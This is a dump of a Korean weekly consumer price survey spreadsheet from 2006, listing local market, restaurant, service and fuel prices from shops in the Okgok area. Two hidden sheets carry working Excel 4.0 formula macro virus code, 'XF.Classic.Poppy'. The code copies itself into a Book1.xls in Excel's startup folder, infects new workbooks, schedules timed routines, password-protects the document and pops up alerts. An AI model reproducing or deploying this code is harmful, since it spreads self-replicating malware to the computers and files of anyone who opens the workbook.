A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: 2 | E20: 2 | F20: 4000 | G20: 3050 | H20: -950 | I20: 옥곡5일시장 | J20: 3500 | K20: 3500 | L20: 0 | M20: 옥곡하나로마트 | N20: 4500 | O20: 2600 | P20: -1900
A21: 15 | B21: 배 | C21: (600-700) | D21: 1 | E21: 2 | F21: 4500 | G21: 4066.5 | H21: -433.5 | I21: 옥곡5일시장 | J21: 4500 | K21: 4500 | L21: 0 | M21: 옥곡하나로마트 | N21: 0 | O21: 3633 | P21: 3633
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 2 | E22: 2 | F22: 3090 | G22: 3125 | H22: 35 | I22: 옥곡5일시장 | J22: 3500 | K22: 3500 | L22: 0 | M22: 옥곡하나로마트 | N22: 2680 | O22: 2750 | P22: 70
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 2 | E23: 2 | F23: 25500 | G23: 26700 | H23: 1200 | I23: 없음 | L23: 0 | M23: 옥곡하나로마트 | N23: 51000 | O23: 53400 | P23: 2400
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: 1 | E24: 1 | F24: 0 | G24: 0 | H24: 0 | I24: 없음 | L24: 0 | M24: 없음 | N24: 0 | O24: 0 | P24: 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: 2 | E25: 2 | F25: 5040 | G25: 5070 | H25: 30 | I25: 없음 | L25: 0 | M25: 옥곡하나로마트 | N25: 10080 | O25: 10140 | P25: 60
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 2 | E26: 2 | F26: 6900 | G26: 6900 | H26: 0 | I26: 옥곡5일시장 | J26: 7000 | K26: 7000 | L26: 0 | M26: 옥곡하나로마트 | N26: 6800 | O26: 6800 | P26: 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: 2 | E27: 2 | F27: 8375 | G27: 8450 | H27: 75 | I27: 옥곡5일시장 | J27: 8500 | K27: 8500 | L27: 0 | M27: 옥곡하나로마트 | N27: 8250 | O27: 8400 | P27: 150
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: 2 | E28: 2 | F28: 1500 | G28: 1750 | H28: 250 | I28: 옥곡5일시장 | J28: 3000 | K28: 3500 | L28: 500 | M28: 옥곡하나로마트 | P28: 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: 2 | E29: 2 | F29: 2750 | G29: 3250 | H29: 500 | I29: 옥곡5일시장 | J29: 2500 | K29: 3500 | L29: 1000 | M29: 옥곡하나로마트 | N29: 3000 | O29: 3000 | P29: 0
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 2 | E30: 2 | F30: 3666.5 | G30: 3816.5 | H30: 150 | I30: 옥곡5일시장 | J30: 3333 | K30: 3333 | L30: 0 | M30: 옥곡하나로마트 | N30: 4000 | O30: 4300 | P30: 300
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: 2 | E31: 2 | F31: 2500 | G31: 2750 | H31: 250 | I31: 옥곡5일시장 | J31: 2500 | K31: 3000 | L31: 500 | M31: 옥곡하나로마트 | N31: 2500 | O31: 2500 | P31: 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 2 | E32: 2 | F32: 4725 | G32: 4725 | H32: 0 | I32: 옥곡5일시장 | J32: 5000 | K32: 5000 | L32: 0 | M32: 옥곡하나로마트 | N32: 4450 | O32: 4450 | P32: 0
A33: 27 | B33: 콩 | C33: 1kg | D33: 2 | E33: 2 | F33: 7250 | G33: 7250 | H33: 0 | I33: 옥곡5일시장 | J33: 6500 | K33: 6500 | L33: 0 | M33: 옥곡하나로마트 | N33: 8000 | O33: 8000 | P33: 0
A34: 28 | B34: 고춧가루 | C34: 3kg | D34: 2 | E34: 2 | F34: 107600 | G34: 107600 | H34: 0 | I34: 옥곡5일시장 | J34: 100000 | K34: 100000 | L34: 0 | M34: 옥곡하나로마트 | N34: 115200 | O34: 115200 | P34: 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(N36,"<>0") -> 2 | E36: 2 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 0 | G36: 0 | H36: =G36-F36 -> 0 | I36: 없음 | L36: =K36-J36 -> 0 | M36: 없음 | P36: =O36-N36 -> 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: 2 | E37: 2 | F37: 0 | G37: 0 | H37: 0 | I37: 없음 | L37: 0 | M37: 없음 | P37: 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: 2 | E38: 2 | F38: 0 | G38: 0 | H38: 0 | I38: 없음 | L38: 0 | M38: 없음 | P38: 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 2 | E39: 2 | F39: 0 | G39: 0 | H39: 0 | I39: 없음 | L39: 0 | M39: 없음 | P39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: 2 | E40: 2 | F40: 0 | G40: 0 | H40: 0 | I40: 없음 | L40: 0 | M40: 없음 | P40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 2 | E41: 2 | F41: 4500 | G41: 4500 | H41: 0 | I41: 환희식당 | J41: 9000 | K41: 9000 | L41: 0 | M41: 없음 | P41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: 2 | E42: 2 | F42: 4500 | G42: 4500 | H42: 0 | I42: 환희식당 | J42: 9000 | K42: 9000 | L42: 0 | M42: 없음 | P42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: 2 | E43: 2 | F43: 0 | G43: 0 | H43: 0 | I43: 없음 | L43: 0 | M43: 없음 | P43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 2 | E44: 2 | F44: 0 | G44: 0 | H44: 0 | I44: 없음 | L44: 0 | M44: 없음 | P44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 2 | E45: 2 | F45: 0 | G45: 0 | H45: 0 | I45: 없음 | L45: 0 | M45: 없음 | P45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: 2 | E46: 2 | F46: 17500 | G46: 17500 | H46: 0 | I46: 노랑통닭 | J46: 20000 | K46: 20000 | L46: 0 | M46: 임금님통닭 | N46: 15000 | O46: 15000 | P46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 2 | E47: 2 | F47: 0 | G47: 0 | H47: 0 | I47: 없음 | L47: 0 | M47: 없음 | P47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: 2 | E48: 2 | F48: 0 | G48: 0 | H48: 0 | I48: 없음 | L48: 0 | M48: 없음 | P48: 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 2 | E49: 2 | F49: 0 | G49: 0 | H49: 0 | I49: 없음 | L49: 0 | M49: 없음 | P49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 2 | E50: 2 | F50: 7000 | G50: 7000 | H50: 0 | I50: 동화루 | J50: 7000 | K50: 7000 | L50: 0 | M50: 이순원 | N50: 7000 | O50: 7000 | P50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 2 | E51: 2 | F51: 9500 | G51: 9500 | H51: 0 | I51: 동화루 | J51: 10000 | K51: 10000 | L51: 0 | M51: 이순원 | N51: 9000 | O51: 9000 | P51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 2 | E52: 2 | F52: 21500 | G52: 21500 | H52: 0 | I52: 동화루 | J52: 23000 | K52: 23000 | L52: 0 | M52: 이순원 | N52: 20000 | O52: 20000 | P52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 2 | E53: 2 | F53: 0 | G53: 0 | H53: 0 | I53: 없음 | L53: 0 | M53: 없음 | P53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 2 | E54: 2 | F54: 0 | G54: 0 | H54: 0 | I54: 없음 | L54: 0 | M54: 없음 | P54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: 2 | E55: 2 | F55: 0 | G55: 0 | H55: 0 | I55: 없음 | L55: 0 | M55: 없음 | P55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: 2 | E56: 2 | F56: 3000 | G56: 3000 | H56: 0 | I56: 꼬솜제과 | J56: 2500 | K56: 2500 | L56: 0 | M56: 옥실애 | N56: 3500 | O56: 3500 | P56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 2 | E57: 2 | F57: 3650 | G57: 3650 | H57: 0 | I57: 꼬솜제과 | J57: 2500 | K57: 2500 | L57: 0 | M57: 옥실애 | N57: 4800 | O57: 4800 | P57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 2 | E58: 2 | F58: 16000 | G58: 16000 | H58: 0 | I58: 환희식당 | J58: =80*200 -> 16000 | K58: =80*200 -> 16000 | L58: 0 | M58: 돈되지삼겹 | N58: =80*200 -> 16000 | O58: =80*200 -> 16000 | P58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 2 | E59: 2 | F59: 0 | G59: 0 | H59: 0 | I59: 없음 | L59: 0 | M59: 없음 | P59: 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: 2 | E60: 2 | F60: 0 | G60: 0 | H60: 0 | I60: 없음 | L60: 0 | M60: 없음 | P60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: 2 | E61: 2 | F61: 1750 | G61: 1750 | H61: 0 | I61: 까투리 | J61: 3500 | K61: 3500 | L61: 0 | M61: 없음 | P61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 18평1개월 (공과금 제외) | D62: 2 | E62: 2 | F62: 41177 | G62: 41177 | H62: 0 | I62: 광양펠리시아 | J62: 82354 | K62: 82354 | L62: 0 | M62: 없음 | P62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 2 | E63: 2 | F63: 6000 | G63: 6000 | H63: 0 | I63: 한일세탁소 | J63: 12000 | K63: 12000 | L63: 0 | M63: 없음 | P63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 2 | E64: 2 | F64: 0 | G64: 0 | H64: 0 | I64: 없음 | L64: 0 | M64: 없음 | P64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 2 | E65: 2 | F65: 0 | G65: 0 | H65: 0 | I65: 없음 | L65: 0 | M65: 없음 | P65: 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 2 | E66: 2 | F66: 0 | G66: 0 | H66: 0 | I66: 없음 | L66: 0 | M66: 없음 | P66: 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 2 | E67: 2 | F67: 0 | G67: 0 | H67: 0 | I67: 없음 | L67: 0 | M67: 없음 | P67: 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: 2 | E68: 2 | F68: 0 | G68: 0 | H68: 0 | I68: 없음 | L68: 0 | M68: 없음 | P68: 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 2 | E69: 2 | F69: 0 | G69: 0 | H69: 0 | I69: 없음 | L69: 0 | M69: 없음 | P69: 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: 2 | E70: 2 | F70: 12500 | G70: 12500 | H70: 0 | I70: 명가원노래연습장 | J70: 25000 | K70: 25000 | L70: 0 | M70: 없음 | P70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 2 | E71: 2 | F71: 0 | G71: 0 | H71: 0 | I71: 없음 | L71: 0 | M71: 없음 | P71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 2 | E72: 2 | F72: 0 | G72: 0 | H72: 0 | I72: 없음 | L72: 0 | M72: 없음 | P72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 2 | E73: 2 | F73: 0 | G73: 0 | H73: 0 | I73: 없음 | L73: 0 | M73: 없음 | P73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 2 | E74: 2 | F74: 0 | G74: 0 | H74: 0 | I74: 없음 | L74: 0 | M74: 없음 | P74: 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: 2 | E75: 2 | F75: 12000 | G75: 12000 | H75: 0 | I75: 김지원미용실 | J75: 12000 | K75: 12000 | L75: 0 | M75: 김영미용실 | N75: 12000 | O75: 12000 | P75: 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: 2 | E76: 2 | F76: 50000 | G76: 50000 | H76: 0 | I76: 김지원미용실 | J76: 50000 | K76: 50000 | L76: 0 | M76: 김영미용실 | N76: 50000 | O76: 50000 | P76: 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 2 | E77: 2 | F77: 500 | G77: 500 | H77: 0 | I77: 옥곡공중목욕장 | J77: 1000 | K77: 1000 | L77: 0 | M77: 없음 | P77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 2 | E78: 2 | F78: 20000 | G78: 20000 | H78: 0 | I78: 대성장 | J78: 40000 | K78: 40000 | L78: 0 | M78: 없음 | P78: 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: 2 | E79: 2 | F79: 0 | G79: 0 | H79: 0 | I79: 없음 | L79: 0 | M79: 없음 | P79: 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 2 | E80: 2 | F80: 0 | G80: 0 | H80: 0 | I80: 없음 | L80: 0 | M80: 없음 | P80: 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: 2 | E81: 2 | F81: 0 | G81: 0 | H81: 0 | I81: 없음 | L81: 0 | M81: 없음 | P81: 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 2 | E82: 2 | F82: 4000 | G82: 4000 | H82: 0 | I82: 로젠택배 | J82: 8000 | K82: 8000 | L82: 0 | M82: CU택배 | P82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 2 | E83: 2 | F83: 0 | G83: 0 | H83: 0 | I83: 없음 | L83: 0 | M83: 없음 | P83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 2 | E84: 2 | F84: =IF(D84=0,0,SUM(J84,N84)/D84) -> 0 | I84: 없음 | L84: 0 | M84: 없음 | P84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 1 | E86: 1 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 5350 | G86: 5350 | H86: =G86-F86 -> 0 | I86: 옥곡5일시장 | J86: 0 | K86: 0 | L86: =K86-J86 -> 0 | M86: 옥곡하나로마트 | N86: 5350 | O86: 5350 | P86: =O86-N86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: 2 | E87: 2 | F87: 1075 | G87: 1075 | H87: 0 | I87: 옥곡5일시장 | J87: 1000 | K87: 1000 | L87: 0 | M87: 옥곡하나로마트 | N87: 1150 | O87: 1150 | P87: 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 1 | E88: 1 | F88: 1080 | G88: 1080 | H88: 0 | I88: 없음 | J88: 0 | K88: 0 | L88: 0 | M88: 옥곡하나로마트 | N88: 1080 | O88: 1080 | P88: 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 1 | E89: 1 | F89: 6980 | G89: 6980 | H89: 0 | I89: 없음 | J89: 0 | K89: 0 | L89: 0 | M89: 옥곡하나로마트 | N89: 6980 | O89: 6980 | P89: 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 1 | E90: 1 | F90: 2380 | G90: 2380 | H90: 0 | I90: 없음 | J90: 0 | K90: 0 | L90: 0 | M90: 옥곡하나로마트 | N90: 2380 | O90: 2380 | P90: 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 1 | E91: 1 | F91: 340 | G91: 340 | H91: 0 | I91: 없음 | J91: 0 | K91: 0 | L91: 0 | M91: 옥곡하나로마트 | N91: 340 | O91: 340 | P91: 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 1 | E92: 1 | F92: 1670 | G92: 1670 | H92: 0 | I92: 없음 | J92: 0 | K92: 0 | L92: 0 | M92: 옥곡하나로마트 | N92: 1670 | O92: 1670 | P92: 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 1 | E93: 1 | F93: 1340 | G93: 1340 | H93: 0 | I93: 없음 | J93: 0 | K93: 0 | L93: 0 | M93: 옥곡하나로마트 | N93: 1340 | O93: 1340 | P93: 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: 0 | E94: 0 | F94: 0 | G94: 0 | H94: 0 | I94: 없음 | J94: 1350 | K94: 1350 | L94: 0 | M94: 없음 | N94: 0 | O94: 0 | P94: 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: 0 | E95: 0 | F95: 0 | G95: 0 | H95: 0 | I95: 농협옥곡지점주유소 | J95: 1435 | K95: 1450 | L95: 15 | M95: 여정광양만주유소 | N95: 1429 | O95: 1429 | P95: 0
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: 0 | E96: 0 | F96: 0 | G96: 0 | H96: 0 | I96: 농협옥곡지점주유소 | J96: 1515 | K96: 1545 | L96: 30 | M96: 여정광양만주유소 | N96: 1536 | O96: 1536 | P96: 0
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 1 | E97: 1 | F97: 0 | G97: 0 | H97: 0 | I97: 없음 | J97: 0 | K97: 0 | L97: 0 | M97: 없음 | N97: 0 | O97: 0 | P97: 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 1 | E98: 1 | F98: 0 | G98: 0 | H98: 0 | I98: 없음 | J98: 0 | K98: 0 | L98: 0 | M98: 없음 | N98: 0 | O98: 0 | P98: 0

Sheet Sheet1 (hidden)
A1: 주간물가동향(2006.10.31).xls | C1: =WORKBOOK.HIDE("XL4Poppy") -> FALSE
A2: Book1
A3: C:\Program Files\Microsoft Office\Office\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
C4: =RUN(C18) -> FALSE
C6: =#N/A -> 
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: =RUN(A21) -> FALSE
A11: (C) The Narkotic Network 1998 | C11: =ON.TIME("6:30:00 PM","Hello") -> FALSE
C12: =ON.TIME("6:30:00 AM","Morning") -> FALSE
C13: =ON.SHEET(,"Poppy",TRUE) -> FALSE
A14: **Simple Payload**
A15: =ALERT("XF.Classic.Poppy by VicodinES",2) -> FALSE
A16: =ALERT("ⓒ 1998 The Narkotic Network",2) -> FALSE
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
A23: =#N/A -> 
A26: =NEW(1) -> FALSE | C26: **Infect Workbook**
A27: =WORKBOOK.INSERT(1) -> FALSE | C27: =RUN(C19) -> FALSE
A28: =WORKBOOK.INSERT(1) -> FALSE
A29: =ACTIVATE.PREV() -> FALSE | C29: =#N/A -> 
A30: =RUN(C18) -> FALSE
A31: =WORKBOOK.COPY("XL4Poppy",A1) -> FALSE
A32: =WORKBOOK.NAME("Sheet3","Sheet99") -> FALSE | C32: =ACTIVATE.PREV() -> FALSE
A33: =WORKBOOK.NAME("Sheet1","Sheet3") -> FALSE | C33: =RUN(C19) -> FALSE
A34: =WORKBOOK.NAME("Sheet99","Sheet1") -> FALSE | C34: =WORKBOOK.COPY("XL4Poppy",A1) -> FALSE
A35: =PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE) -> FALSE
A36: =WORKBOOK.PREV() -> FALSE
A37: =WORKBOOK.PREV() -> FALSE
A38: =WORKBOOK.PREV() -> FALSE
A39: =SAVE.AS(A3) -> FALSE
A40: =FILE.CLOSE() -> FALSE | C40: =MESSAGE(TRUE,"VicodinES and Lord Natas greet you a good morning!") -> FALSE

Sheet -------- (hidden)
A1: 주간물가동향(2006.10.31).xls | C1: =WORKBOOK.HIDE("XL4Poppy") -> FALSE
A2: Book1
A3: C:\Program Files\Microsoft Office\Office\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
C4: =RUN(C18) -> FALSE
C6: =#N/A -> 
A7: Classic.Poppy by VicodinES
A8: With Lord Natas
A9: An Excel Formula Macro Virus (XF.Classic)
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: =RUN(A21) -> FALSE
A11: (C) The Narkotic Network 1998 | C11: =ON.TIME("6:30:00 PM","Hello") -> FALSE
C12: =ON.TIME("6:30:00 AM","Morning") -> FALSE
C13: =ON.SHEET(,"Poppy",TRUE) -> FALSE
A14: **Simple Payload**
A15: =ALERT("XF.Classic.Poppy by VicodinES",2) -> FALSE
A16: =ALERT("ⓒ 1998 The Narkotic Network",2) -> FALSE
C17: **Set Our Values and Paths**
A20: **Add New Workbook, Infect It, Save It As Book1.xls**
A23: =#N/A -> 
A26: =NEW(1) -> FALSE | C26: **Infect Workbook**
A27: =WORKBOOK.INSERT(1) -> FALSE | C27: =RUN(C19) -> FALSE
A28: =WORKBOOK.INSERT(1) -> FALSE
A29: =ACTIVATE.PREV() -> FALSE | C29: =#N/A -> 
A30: =RUN(C18) -> FALSE
A31: =WORKBOOK.COPY("XL4Poppy",A1) -> FALSE
A32: =WORKBOOK.NAME("Sheet3","Sheet99") -> FALSE | C32: =ACTIVATE.PREV() -> FALSE
A33: =WORKBOOK.NAME("Sheet1","Sheet3") -> FALSE | C33: =RUN(C19) -> FALSE
A34: =WORKBOOK.NAME("Sheet99","Sheet1") -> FALSE | C34: =WORKBOOK.COPY("XL4Poppy",A1) -> FALSE
A35: =PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE) -> FALSE
A36: =WORKBOOK.PREV() -> FALSE
A37: =WORKBOOK.PREV() -> FALSE
A38: =WORKBOOK.PREV() -> FALSE
A39: =SAVE.AS(A3) -> FALSE
A40: =FILE.CLOSE() -> FALSE | C40: =MESSAGE(TRUE,"VicodinES and Lord Natas greet you a good morning!") -> FALSE

Sheet Sheet2
B2: 구 분 | C2: 품 목 | D2: 규 격 | E2: 가격 조사 결과 (단위:원) | H2: 비 고
E3: 전주 | F3: 금 주 | G3: 등락가
B4: 농산물 | C4: 무 | D4: 상품 1개 1kg | E4: =총괄!F8 -> 1,460 | F4: =총괄!G8 -> 1,363 | G4: =총괄!H8 -> -97
C5: 양파 | D5: 1망(1kg) | E5: =총괄!F13 -> 2,790 | F5: =총괄!G13 -> 2,801 | G5: =총괄!H13 -> 11
C6: 배추 | D6: 1포기 3kg | E6: =총괄!F18 -> 3,496 | F6: =총괄!G18 -> 3,538 | G6: =총괄!H18 -> 42
C7: 오이 | D7: 상품 3개 | E7: =총괄!F14 -> 5,047 | F7: =총괄!G14 -> 5,179 | G7: =총괄!H14 -> 132
C8: 상추 | D8: 양상추 500g | E8: =총괄!F10 -> 2,464 | F8: =총괄!G10 -> 2,624 | G8: =총괄!H10 -> 160
C9: 애호박 | D9: 상품1개(250~300g) | E9: =총괄!F11 -> 2,874 | F9: =총괄!G11 -> 2,978 | G9: =총괄!H11 -> 104
C10: 마늘 | D10: 깐것 상품 1kg | E10: =총괄!F16 -> 9,908 | F10: =총괄!G16 -> 9,466 | G10: =총괄!H16 -> -442
C11: 감자 | D11: 흰색1kg | E11: =총괄!F17 -> 4,524 | F11: =총괄!G17 -> 4,667 | G11: =총괄!H17 -> 143
C12: 배 | D12: 상품1개(650~700g) | E12: =총괄!F21 -> 4,878 | F12: =총괄!G21 -> 4,749 | G12: =총괄!H21 -> -129
C13: 달걀 | D13: 특란30개 한판 | E13: =총괄!F27 -> 8,161 | F13: =총괄!G27 -> 8,082 | G13: =총괄!H27 -> -79
B14: 축산물 | C14: 쇠고기(한우) | D14: 등심 600g(상등육) | E14: =총괄!F23 -> 55,500 | F14: =총괄!G23 -> 51,658 | G14: =총괄!H23 -> -3,842
B15: 수산물 | C15: 명태 | D15: 40cm1마리 | E15: =총괄!F30 -> 3,860 | F15: =총괄!G30 -> 4,044 | G15: =총괄!H30 -> 184
C16: 조기 | D16: 15cm1마리 | E16: =총괄!F28 -> 2,096 | F16: =총괄!G28 -> 2,357 | G16: =총괄!H28 -> 260
B17: 공산품등 | C17: 휘발유 | D17: 주유소 판매 1ℓ | E17: =총괄!F96 -> 1,554 | F17: =총괄!G96 -> 1,574 | G17: =총괄!H96 -> 20
